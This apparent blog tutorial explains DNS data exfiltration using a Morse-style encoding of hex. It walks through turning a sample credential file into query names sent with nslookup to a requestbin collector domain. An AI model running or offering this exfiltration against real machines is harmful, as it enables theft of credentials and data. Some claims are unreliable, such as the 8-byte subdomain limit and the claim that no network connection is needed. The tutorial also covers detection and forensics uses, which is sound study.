Data Exfiltration over DNS Queries via Morse Code
In this article, we will discuss a data exfiltration technique that transfers encoded information over DNS. Also, besides explaining, I’ll actually show you how to do this.
What is Data Exfiltration?
We will start by explaining the meaning behind Data Exfiltration. Basically, it is a method of transferring information over various channels from a compromised machine to the attacker’s destination.
This data can include confidential documents, passwords, private keys, database dumps, personal, financial or health information records.
Data Exfiltration can be categorized in two types, depending on the volume of information exported:
- Bulk Data Exfiltration: transfers large volumes of data, sometimes random data and useless for the attacker. This method is mostly employed by malware or ransomware. Most probable, after data is extracted, the target system will be encrypted.
- Specific Data Exfiltration: attackers search for an exact file or information on the compromised machine. Almost every time, the attack’s main purpose is getting hands on that piece of information.
Why to exfiltrate over DNS?
Surprising, this technique is very old (over 20 years), but it is still very effective nowadays.
Probably, you’ll ask why don’t we just upload the compromised files to a cloud storage or directly transfer them via protocols like HTTP, FTP, SSH, Telnet and so on. In order to do exfiltration over the protocols mentioned above, the target machine must initiate a network connection and that will be easily noticed by any basic firewall or monitoring tool.
DNS Exfiltration does not require an active network connection in order to send data over Internet, so basically, it will bypass (almost!) all basic security tools, unless you have an advanced solution in place that analyzes outbound DNS queries.
Why NOT to exfiltrate over DNS?
DNS queries can be analyzed by a monitoring tool (Firewall, IDS/IPS, etc.) and there can be complex rules configured to easily detect this kind of exfiltration and other malicious actions that are carried over DNS (for example, C&C commands sent to malware over DNS queries)
Only chunks of maximum 64-bits (8-bytes) of data can be carried through a single subdomain query, so multiple requests must be sent and if a rate-limiting policy is set in place, after some time, those queries will be dropped.
NEVER exfiltrate via plaintext, regardless of the technique or protocol used.
How to exfiltrate over DNS via Morse Code
First, we must know the concept behind this technique.
From a compromised server or machine, the attacker will launch DNS queries to lookup the nameservers of a specific domain controlled by the attacker. The exfiltrated data will be placed in the requested nameservers (NS).
We will transform the data into hexadecimal, after that we will represent it using Morse code.
That would be our exfiltration scheme, now we must construct a mapping between hexadecimal characters and their representation in Morse code.
We will use only 0–9 digits and A-F letters.
We can represent the lines using 1 and dots using 0, so our we will get the following mapping:
0 = 11111
1 = 01111
2 = 00111
3 = 00011
4 = 00001
5 = 00000
6 = 10000
7 = 11000
8 = 11100
9 = 11110
A = 01
B = 1000
C = 1010
D = 100
E = 0
F = 0010
Delimiter = .
Let’s set up a temporary DNS subdomain that collects its requests using DNSBin.
Now, we must choose a file to exfiltrate over queries to that subdomain. I created a quick file, echoed some credentials there and converted it to hexadecimal.
Our hexadecimal representation of the file is:
61646d696e3a50407373773072643132330a
We will divide it in chunks of maximum 10 characters:
61646d696e
3a50407373
7730726431
32330a
Now, we must represent them using the Morse code:
10000.01111.10000.00001.10000.100.10000.11110.10000.0
00011.01.00000.11111.00001.11111.11000.00011.11000.00011
11000.11000.00011.11111.11000.00111.10000.00001.00011.01111
00011.00111.00011.00011.11111.01
Next, we must append the generated subdomain from DNSBin to those payloads:
10000.01111.10000.00001.10000.100.10000.11110.10000.0.8b2d8cddf0d118c84688.d.requestbin.net00011.01.00000.11111.00001.11111.11000.00011.11000.00011.8b2d8cddf0d118c84688.d.requestbin.net11000.11000.00011.11111.11000.00111.10000.00001.00011.01111.8b2d8cddf0d118c84688.d.requestbin.net00011.00111.00011.00011.11111.01.8b2d8cddf0d118c84688.d.requestbin.net
I’ll use nslookup in order to send those DNS queries.
Let’s check the DNSBin logs.
And here they are!
The next step would be to decode from Morse code representation to HEX, and then from HEX to plaintext.
The requests looks like this over the network, so they are pretty obvious.
Please do not use this technique in real-life scenarios as it is not secure and you can get caught easily, but you could get over some packet capture files that are similar to this practice in a Forensics investigation or CTF competition.
Thank you very much for your attention!